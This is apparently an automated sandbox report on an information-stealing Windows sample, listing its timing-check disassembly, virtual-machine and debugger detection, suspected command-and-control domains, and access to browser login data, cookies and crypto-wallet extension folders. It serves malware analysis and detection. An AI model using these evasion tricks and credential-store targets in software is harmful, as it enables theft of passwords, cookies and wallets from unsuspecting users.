            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7018A second address: 4E701E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FD888D50BEDh 0x00000012 mov edi, ecx 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FD888D50BEAh 0x0000001b jmp 00007FD888D50BF2h 0x00000020 popad 0x00000021 popad 0x00000022 inc ebx 0x00000023 pushad 0x00000024 mov bx, ax 0x00000027 mov esi, 6EAE5D69h 0x0000002c popad 0x0000002d test al, al 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov eax, ebx 0x00000034 push ebx 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701E2 second address: 4E701E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701E8 second address: 4E701EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701EC second address: 4E7022A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD888F38C2Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, 32E5B780h 0x00000019 jmp 00007FD888F38A39h 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7022A second address: 4E70230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70230 second address: 4E70264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b jmp 00007FD888F38A2Fh 0x00000010 mov dword ptr [ebp-14h], edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD888F38A35h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70264 second address: 4E7026A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7026A second address: 4E7026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702A8 second address: 4E702AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702AC second address: 4E702C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702C8 second address: 4E702CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702CE second address: 4E702FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e mov cx, 758Dh 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FD888F38A38h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70337 second address: 4E7035E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 jmp 00007FD888D50BF3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007FD8F997ED1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7035E second address: 4E70365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70365 second address: 4E70382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888D50BF9h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70382 second address: 4E70422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FD888F38A97h 0x00000011 pushad 0x00000012 mov eax, 161EB2B3h 0x00000017 jmp 00007FD888F38A38h 0x0000001c popad 0x0000001d cmp dword ptr [ebp-14h], edi 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FD888F38A2Eh 0x00000027 adc ch, FFFFFFE8h 0x0000002a jmp 00007FD888F38A2Bh 0x0000002f popfd 0x00000030 pushad 0x00000031 call 00007FD888F38A36h 0x00000036 pop esi 0x00000037 mov ax, bx 0x0000003a popad 0x0000003b popad 0x0000003c jne 00007FD8F9B66AC4h 0x00000042 jmp 00007FD888F38A2Dh 0x00000047 mov ebx, dword ptr [ebp+08h] 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FD888F38A2Dh 0x00000051 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70422 second address: 4E7045C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c jmp 00007FD888D50BEEh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FD888D50BEDh 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7045C second address: 4E70461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70461 second address: 4E704BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD888D50BF1h 0x00000011 and ax, 40D6h 0x00000016 jmp 00007FD888D50BF1h 0x0000001b popfd 0x0000001c mov di, si 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD888D50BF9h 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E704BC second address: 4E704E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD888F38A2Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dx, si 0x00000011 mov edi, esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD888F38A32h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E704E9 second address: 4E704F7 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E704F7 second address: 4E704FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E705BC second address: 4E705C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E705C0 second address: 4E705C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DFEDF8 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DFEE1C instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1031625 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D5D9CB instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D5DA72 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5EFE2E3 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5EFCA4D instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F92A38 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D61CD4 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6516Thread sleep time: -30015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 2764Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000000.00000002.2395238528.0000000005EDC000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2395678480.0000000006351000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2384766789.0000000000F86000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062057926.00000000058B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: file.exe, 00000000.00000002.2381863599.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2381863599.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2381863599.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2029250891.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2029739243.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: file.exe, 00000000.00000003.2062057926.00000000058B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: file.exe, 00000000.00000003.2346706991.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\6ru\
            Source: file.exe, 00000000.00000002.2395238528.0000000005EDC000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2395678480.0000000006351000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2384766789.0000000000F86000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: file.exe, 00000000.00000003.2062163059.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: file.exeString found in binary or memory: navygenerayk.store
            Source: file.exeString found in binary or memory: scriptyprefej.store
            Source: file.exeString found in binary or memory: necklacedmny.store
            Source: file.exeString found in binary or memory: founpiuer.store
            Source: file.exeString found in binary or memory: fadehairucw.store
            Source: file.exeString found in binary or memory: thumbystriw.store
            Source: file.exeString found in binary or memory: presticitpo.store
            Source: file.exeString found in binary or memory: crisiwarny.store
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: file.exe, 00000000.00000002.2385008510.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: nProgram Manager
            Source: file.exe, file.exe, 00000000.00000002.2395238528.0000000005EDC000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: ]Program Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000000.00000003.2129039550.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128980103.000000000585B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
